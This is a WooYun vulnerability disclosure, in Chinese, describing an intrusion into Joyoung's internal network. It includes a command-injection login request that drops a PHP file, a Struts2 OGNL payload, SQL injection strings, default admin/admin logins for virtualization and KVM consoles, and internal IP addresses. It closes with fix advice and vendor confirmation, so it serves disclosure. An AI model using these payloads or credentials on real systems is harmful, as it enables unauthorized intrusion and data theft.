当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173515

漏洞标题:某漏洞导致的一次九阳内网漫游

相关厂商:joyoung.com

漏洞作者: jianFen

提交时间:2016-01-29 09:22

修复时间:2016-03-13 18:02

公开时间:2016-03-13 18:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-29: 细节已通知厂商并且等待厂商处理中
2016-01-29: 厂商已经确认,细节仅向厂商公开
2016-02-08: 细节向核心白帽子及相关领域专家公开
2016-02-18: 细节向普通白帽子公开
2016-02-28: 细节向实习白帽子公开
2016-03-13: 细节向公众公开

简要描述:

修起来

详细说明:

引:
http://wooyun.org/bugs/wooyun-2010-0141195 根据之前的漏洞咯
account过滤了. password处还是没有过滤啊

POST /ease/App/index.php/Public/dologin HTTP/1.1
Host: plmyun.joyoung.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://plmyun.joyoung.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://plmyun.joyoung.com/ease/App/index.php/Public/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6
account=123&password=123%22%26echo '<?php phpinfo() ?>' >  /var/www/cgi-
bin/yo.php%26ifconfig
%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08b
f0b87b5


1.PNG


用可新版菜刀即可支持https 老版本NO
tunnel http 反向隧道
先访问一些内部系统

3.PNG


#1

mask 区域 
1.http://**.**.**

/systeminfo?vendor=CITRIX&licenseTab=&selected=
admin/admin 虚拟化管理弱口令

4.PNG


#2
https://172.31.1.120/appliance-overview.php
admin/admin
美国AVOCENT KVM
产品特性
MergePoint Unity交换机在单个设备中结合了 KVM over IP和串行控制台管理技术。这项独
特的结合为IT管理员提供了用于访问和控制服务器、网络设备及其他数据中心和分支办公室
设备的完整远程管理

8.PNG


6.PNG


#3

Target: 


mask 区域


1.http://**.**.**/






executeSQLFileAction.action
Whoami: nt authority\system
WebPath: C:\tomcat\defalut\webapps\ROOT
OS.Name: Windows 2003
OS.Version: 5.2
Java.Home: C:\Program Files\Java\jdk1.6.0_17\jre
Java.Version: 1.6.0_17
OS.arch: x86
User.Name: SYSTEM
User.Home: C:\Documents and Settings\Default User
User.Dir: C:\WINDOWS\system32
Java.Class.Path: C:\tomcat\defalut\bin\bootstrap.jar
Java.IO.Tmpdir: C:\tomcat\defalut\temp


#4



mask 区域


1.http://**.**.**






/jy_admin/security!login.action?redirect%3A%24%7B%23req%3D
%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest
%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext
%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C
%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush
%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


#5

mask 区域 
1.http://**.**.**

/Default.aspx 运维信息平台
1'or'1'='1 存在注入
123456

7.PNG


漏洞证明:

http://172.31.0.111/Web/Users/login.asp
' and 1=convert(int,(select top 1 Password from Users)) -- 
'or'1'='1  09126970585


9.PNG

修复方案:

1.修复入口处命令执行
2.内网常见漏洞修补. SQL注入 struts命令执行等
3.设备各种默认口令

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-29 09:38

厂商回复:

感谢白帽子指出系统的安全问题,我们安排整改。

最新状态:

暂无

漏洞评价:

评价